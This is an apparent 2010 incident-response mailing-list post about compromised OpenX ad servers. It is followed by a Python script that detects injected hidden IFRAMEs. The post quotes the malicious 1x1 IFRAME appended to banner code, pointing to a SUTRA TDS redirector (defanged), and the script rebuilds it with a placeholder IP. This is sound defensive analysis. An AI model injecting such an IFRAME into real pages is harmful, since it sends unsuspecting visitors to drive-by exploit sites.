[nsp-sec] iframe on OpenX server: similar experiences exploit experiences with AS6851

Thomas Hungenberg th.lab at hungenberg.net
Thu Aug 19 07:46:47 EDT 2010


Carles Fragoso wrote:
> Sorry ... what's SUTRA?

SUTRA TDS is a traffic redirection system.
Some info here (Google translation):
http://translate.google.de/translate?sl=ru&tl=en&u=http://www.kytoon.com/sutra-tds.html

It's a popular tool to redirect users from injected IFRAMEs to different drive-by-exploit sites.
I haven't seen a legit use of SUTRA yet...

SUTRA URLs usually end in '.../tds/in.cgi?default' or '.../tds/in.cgi?[0-9]'


> Interesting ... thanks for the feedback. It would be great to find which is the way they are taking profit of append function.

The banner code delivered by OpenX looks like:
---------------------
<html>
<head>
<title>Advertisement</title>
</head>
<body leftmargin='0' topmargin='0' marginwidth='0' marginheight='0' [...]
<img src='http://openx.server.tld/www/images/b6a45697ed960c91569.jpg' width='180' height='120' alt='' title='' border='0' /></a>
<div id='beacon_db403b7c44' style='position: absolute; left: 0px; top: 0px; visibility: hidden;'>
<img src='http://openx.server.tld/www/delivery/lg.php?bannerid=12&campaignid=8&zoneid=3&cb=db402b7c44'
 width='0' height='0' alt='' style='width: 0px; height: 0px;' /></div>
</body>
</html>
---------------------

On compromised OpenX servers, the attackers install an append function with code like this:
---------------------
<iframe src="h[XX]p://85.234.190.62/tds/in.cgi?default" width="1" height="1" hspace="0" vspace="0" frameborder="0" scrolling="no"></iframe>
---------------------

So the banner code for several campaigns delivered by the OpenX server on sp.fcbarcelona.cat
looked like this on Tuesday:
---------------------
<html>
<head>
<title>Advertisement</title>
</head>
<body leftmargin='0' topmargin='0' marginwidth='0' marginheight='0' [...]
<img src='http://openx.server.tld/www/images/b6a45697ed960c91569.jpg' width='180' height='120' alt='' title='' border='0' /></a>
<div id='beacon_db403b7c44' style='position: absolute; left: 0px; top: 0px; visibility: hidden;'>
<img src='http://openx.server.tld/www/delivery/lg.php?bannerid=12&campaignid=8&zoneid=3&cb=db402b7c44'
 width='0' height='0' alt='' style='width: 0px; height: 0px;' /></div>
<iframe src="h[XX]p://85.234.190.62/tds/in.cgi?default" width="1" height="1" hspace="0" vspace="0" frameborder="0" scrolling="no"></iframe>
</body>
</html>
---------------------


Hope this helps.


     - Thomas

CERT-Bund Incident Response & Anti-Malware Team
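As an added example (not part of Thomas's mail or of OpenX itself), the following Python script shows how a defender could screen banner code delivered by an OpenX server for the kind of injected hidden IFRAME described above. It combines three signals taken from the post: the SUTRA TDS URL pattern ('.../tds/in.cgi?default' or '.../tds/in.cgi?[0-9]'), a 1x1 or otherwise hidden frame, and a frame origin that is not the ad server itself. The sample banner HTML is constructed to mirror the structure shown in the mail, the IP 203.0.113.10 is a documentation placeholder standing in for the real redirector, and the function names are my own.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# SUTRA TDS entry point as described in the post:
# '.../tds/in.cgi?default' or '.../tds/in.cgi?<digit>'
SUTRA_PATH_RE = re.compile(r"/tds/in\.cgi\?(?:default|[0-9]+)$")

# Constructed sample of a clean OpenX banner response (assumed structure,
# placeholder advertiser link; not a real capture).
CLEAN_BANNER = """<html><head><title>Advertisement</title></head>
<body>
<a href='http://advertiser.example/'><img src='http://openx.server.tld/www/images/b6a45697ed960c91569.jpg' width='180' height='120' alt='' border='0' /></a>
<div id='beacon_db403b7c44' style='position: absolute; left: 0px; top: 0px; visibility: hidden;'>
<img src='http://openx.server.tld/www/delivery/lg.php?bannerid=12&campaignid=8&zoneid=3&cb=db402b7c44' width='0' height='0' alt='' /></div>
</body></html>"""

# Same banner with an appended hidden IFRAME; 203.0.113.10 is a documentation
# placeholder, not the redirector from the incident.
INJECTED_IFRAME = ('<iframe src="http://203.0.113.10/tds/in.cgi?default" width="1" height="1" '
                   'hspace="0" vspace="0" frameborder="0" scrolling="no"></iframe>')
INJECTED_BANNER = CLEAN_BANNER.replace("</body>", INJECTED_IFRAME + "\n</body>")


def is_sutra_url(url):
    """True if the URL ends in the SUTRA TDS redirector pattern."""
    return bool(SUTRA_PATH_RE.search(url))


class IframeCollector(HTMLParser):
    """Collects every <iframe> start tag and its attributes."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def _as_int(value):
    """Parse '1', '0px' etc. into an int; None if absent or unparsable."""
    try:
        return int(value.strip().rstrip("px"))
    except (ValueError, AttributeError):
        return None


def _is_hidden(attrs):
    """Frame is effectively invisible: at most 1x1, or hidden via inline style."""
    w, h = _as_int(attrs.get("width")), _as_int(attrs.get("height"))
    tiny = w is not None and h is not None and w <= 1 and h <= 1
    style = attrs.get("style", "").replace(" ", "").lower()
    return tiny or "display:none" in style or "visibility:hidden" in style


def find_suspicious_iframes(html, ad_server_host):
    """Return a list of {'src', 'reasons'} for every IFRAME that trips a check."""
    collector = IframeCollector()
    collector.feed(html)
    findings = []
    for attrs in collector.iframes:
        src = attrs.get("src", "")
        reasons = []
        if is_sutra_url(src):
            reasons.append("sutra-tds-url")
        if _is_hidden(attrs):
            reasons.append("hidden-1x1")
        host = urlparse(src).hostname
        if host and host != ad_server_host:
            reasons.append("third-party-origin")
        if reasons:
            findings.append({"src": src, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for name, banner in (("clean", CLEAN_BANNER), ("injected", INJECTED_BANNER)):
        print(name, find_suspicious_iframes(banner, "openx.server.tld"))
```

When running this over real delivery output, fetch the banner code the way a browser would (the same zone URL and a normal User-Agent), since injected content may only be served under some conditions. Note that samples pasted from list mail are usually defanged ("h[XX]p://") and need the scheme restored before the URL checks apply. A third-party IFRAME on its own is not proof of compromise, as some legitimate campaigns are served that way; the combination of a hidden frame pointing at a '/tds/in.cgi' redirector is what should trigger a closer look at the OpenX installation.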
